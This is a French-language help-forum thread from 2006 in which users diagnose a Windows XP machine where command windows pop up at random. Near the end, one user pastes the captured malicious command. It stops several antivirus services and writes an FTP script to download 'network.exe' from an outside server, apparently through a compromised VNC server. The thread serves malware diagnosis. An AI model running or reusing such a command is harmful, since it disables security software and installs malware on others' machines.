Bonjour à tous,

Voici ce qui se passe sur le PC d'un ami:

De manière erratique, la fenêtre de commande "CMD.EXE" s'ouvre et la ligne de commande suivante apparaît:

c del i1echo open(*: (%:"=/:/) +=*+( >i1echo user + + >> i1echo get ç =": exe >> i 1 echo quit >> i 1 ftp 6n 6s$i......( reste illisible)

Windows poste une erreur disant :
Windows ne parvient pas à accéder au périphérique, au chemin d'accès ou au fichier.

En cliquant OK sur la fenêtre d'erreur, tout disparait jusqu'à la prochaine fois.
Fréquence: peut parfois 2x en 10 min. ou rien pendant des heures.
Je soupçonne une attaque de l'extérieur, mais je ne parviens pas à localiser.

Configuration:

Processeur Intel 3.0G, disque SAta 160GB,

Windows xp sp2 ( rechargé complétement le 22.11.2006, avec toutes les dernières mises à jour.
Adaware, AVG 7.5, sypbot ne trouve rien
Antivirus à jour ( antivir personal edition version 7 )
Hijack log analysé par le prog. automatique sur http://www.hijackthis.de/fr déclare tout OK

J'ai recherché en vain un programme batch *.bat sans succès.

Est-ce qu'un génial libellulien aurait une idée ?

Merci par avance de votre aide.

Cloburk

Hello,

quand tu as la fenetre, as tu ete voir dans les processus si il y a quelque chose qui s'etait ouvert? pitete une piste pour trouver ou se trouve ce qui lance le dos...

hello,

avec une ptite mise en page, ça commence à ressembler a qqe chose...

c del i1
open(*: (%:"=/:/) +=*+( >i1
user + + >> i1
get ç =": exe >> i 1
quit >> i 1 ftp 6n 6s$i......

( reste illisible)

@++

Merci Wago.
J'avais également mis en forme pour essayer de comprendre. Je l'avais transcrit tel qu'il apparait dans le message.

Oui, je suis aller voir les processus. Cependant, il se pourrait que le processus se ferme très rapidement et qu'on y voie que du feu et de la paille de fer.

Mon espoir est que quelqu'un aie eu ce problème et l'aie solutionné.

Merci et salutations

Cloburk

re.

si le fenêtre continue à s'ouvrir,

essayes d'utiliser filemon - regmon pour identifier les ressources ouvertes juste avant l'execution de la commande.

question bête mais,

1. pas de tâhe planifiée (maj antivirus, etc..)
2. as-tu aussi cherché un fichier .cmd
3. ...


Bonne chance...

Edit:
Encore mieux, essayes avec ça:
http://www.microsoft.com/technet/sysint ... lorer.mspx
RE edit:
La petite cible en haut de l'application te permet de pointer la fenêtre que tu veus (ton message d'erreur) et ça te montre le process qui y corespond.

Ca sent le virus, spyware ou truc pas franc.
Poste un log hijackthis, on éliminera quelques lignes.
(mode d'emploi si besoin)

Merci Falkra,
Comme dit au début, le log Hijackthis a été déclaré propre par l'analyseur automatique. Cependant je le poste ci-dessous:

Logfile of HijackThis v1.99.1
Scan saved at 14:50:06, on 23.11.2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\NDAS\System\ndassvc.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\NDAS\System\ndasmgmt.exe
C:\Program Files\Sauvegarde\Sauvegarde TrayIcon.exe
C:\Program Files\APC\APC PowerChute Personal Edition\apcsystray.exe
C:\Program Files\Outlook Express\msimn.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
C:\Program Files\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\system32\wuauclt.exe
D:\Outils\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ch/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Startup: Sauvegarde TrayIcon.lnk = C:\Program Files\Sauvegarde\Sauvegarde TrayIcon.exe
O4 - Global Startup: APC UPS Status.lnk = ?
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: NDAS Device Management.lnk = C:\Program Files\NDAS\System\ndasmgmt.exe
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupda ... 4192359919
O17 - HKLM\System\CCS\Services\Tcpip\..\{C56AB5F2-0042-4861-9F3E-6230DA86474C}: NameServer = 192.168.1.1
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - AVIRA GmbH - C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: APC UPS Service - American Power Conversion Corporation - C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: Service NDAS (ndassvc) - XIMETA, Inc. - C:\Program Files\NDAS\System\ndassvc.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Merci à tous

En efet c'est sain, les seules choses exotiques sont le service APC de gestion d'énergie, le disque NDAS ximeta et VNC, + son résidu apparent (file missing, mais parfois pas tant que ça, n'efface pas si tu utilises VNC, aparemment c'est le cas). Sain mais un peu exotique, ça pourrait d'un de ces trois, mais ça semble peu probable. Dans le doute va voir si les dossiers d'installation de ces programmes contiennent des scripts pour les connexions, ça ne risque rien.

Je ne vois pas de firewall (sauf si intégré à AVG ou tu es derrière un routeur qui fait office) ?

salut

moi je dit trojan!!! j avais eu cette sorte de manifestation j avais chope un

trojan qui me lancer cmd.exe et ftp.exe bon!! j aimerai que tu m analyse

ton pc sur ce module ci dessous et note son nom apres on fera le

necessaire

http://assiste.free.fr/p/anti_spywares_ ... _ligne.php

salut , regarde aussi dans msconfig a onglet demarrage si ya rien de louche la et menu > programme > demarrage on sais jamais .. clean aussi la base de registre avec genre tuneup 2006 regarde aussi a C:\WINDOWS\Tasks . sinon c clair que c est une saloperie .. voila courage bye .

Merci à tous.
Voici quelques éléments de réponse:
1. Le firewall de xp sp2 est actif
2. La machine est derrière un routeur Netopia Cayman 3347
3. J'utilise VNC pour m'occuper de cette machine à distance.
4. Ximeta est un produit de gestion de disque NDAS ( réseau ethernet ). le disque est un Freecom SL de 80gb partagé entre deux PC.
5. Sauvegarde est un logiciel libre du LesoldatInconnu.

Je procéderai aux actions suggérées dés lundi.

Merci et bon weekend
Cloburk

Bonjour à tous,

Une petite précision: le processus APC ( exotique selon Falkra ) est le processus qui gère l'alimentation sans coupure ( APC Powerchute), donc parfaitement normal.
Depuis vendredi dernier, plus de fenêtre intempestive. Je ferai une action demain selon les conseils cités plus haut dans ce post.
Merci. Cloburk

Bonsoir à tous,

Voici que j'ai testé cette machine avec Pestpatrol en ligne comme demandé. Il n'a rien trouvé. J'ai également installé le Procexp et instruit la personne à s'en servir si le phénomène devait se reproduire.
En fait , plus aucune manif de cmd intempestif depuis 3 jours.
Je mets donc résolu dans le titre.... en attendant.

Merci de vos divers conseils
Cloburk':-D
Very Happy

Bonsoir,

J'ai le même problème depuis 3 ou 4 jours... Aucun virus, ni trojan détecté. J'ai moi aussi le serveur VNC installé et activé. J'ai identifié qu'une connection VNC est activée (indiquée par l'icone de la barre système) lorsque le problème survient, c'est à dire comme si quelqu'un prenait le controle de la machine à distance ! Mais il me semble qu'aucune connection "réelle" n'est créée : mon firewall ne permet à priori pas de connection de l'extérieur.

J'ai réinstallé VNC aujourd'hui, au cas où le problème viendrait d'un exe VNC "modifié" (par un virus ou autre). Je vous tiens au courant.

Nico

VNC ouvre une fenêtre de type CMD au démarrage du service qu'il utilise (elle le lance en ligne de commande), ça peut venir de là, auquel cas c'est normal.

Non ce n'est pas le fonctionnement normal. J'utilise VNC depuis 2 ans environ, et ça c'est nouveau. J'ai réinstallé la dernière version de VNC et le problème a disparu.. pour l'instant !

Pour info voici un copier/coller des commandes qui sont lancées (ce ne sont pas exactement les mêmes à chaque fois) :

Code: Tout sélectionner

stop "Security Center" &net stop navapsvc &net stop kavsvc &net stop McAfeeFramework &net stop NOD32krn &net stop McShield &net stop "Symantec AntiVirus" &net stop "Norton AntiVirus Server" &echo open ftp.bigboat.be 21 > i&echo get network.exe >> i &echo quit

En gros c'est une tentative de fermer les antivirus et de télécharger "network.exe" sur le site ftp.bigboat.be... Par clair tout ça..

Nico

Houla, pas net du tout en effet !
Si on ne voit rien sous hijackthis, ça peut être un rootkit. Je te conseille IceSword pour détecter une éventuelle saleté, ou d'autres programmes :
Plus d'infos dans le guide antispy et anti rootkits :
http://www.libellules.ch/phpBB2/viewtopic.php?t=15626

Merci du conseil, je vais regarder de ce côté là.

Nico